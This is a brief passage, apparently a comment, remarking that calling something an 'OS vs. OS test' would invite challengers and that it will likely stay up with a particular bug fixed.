Of course, if you insist on declaring this to be an OS vs. OS test, they'll probably take you up on the idea. This also looks like it will be kept up for a while, with that particular bug fixed of course.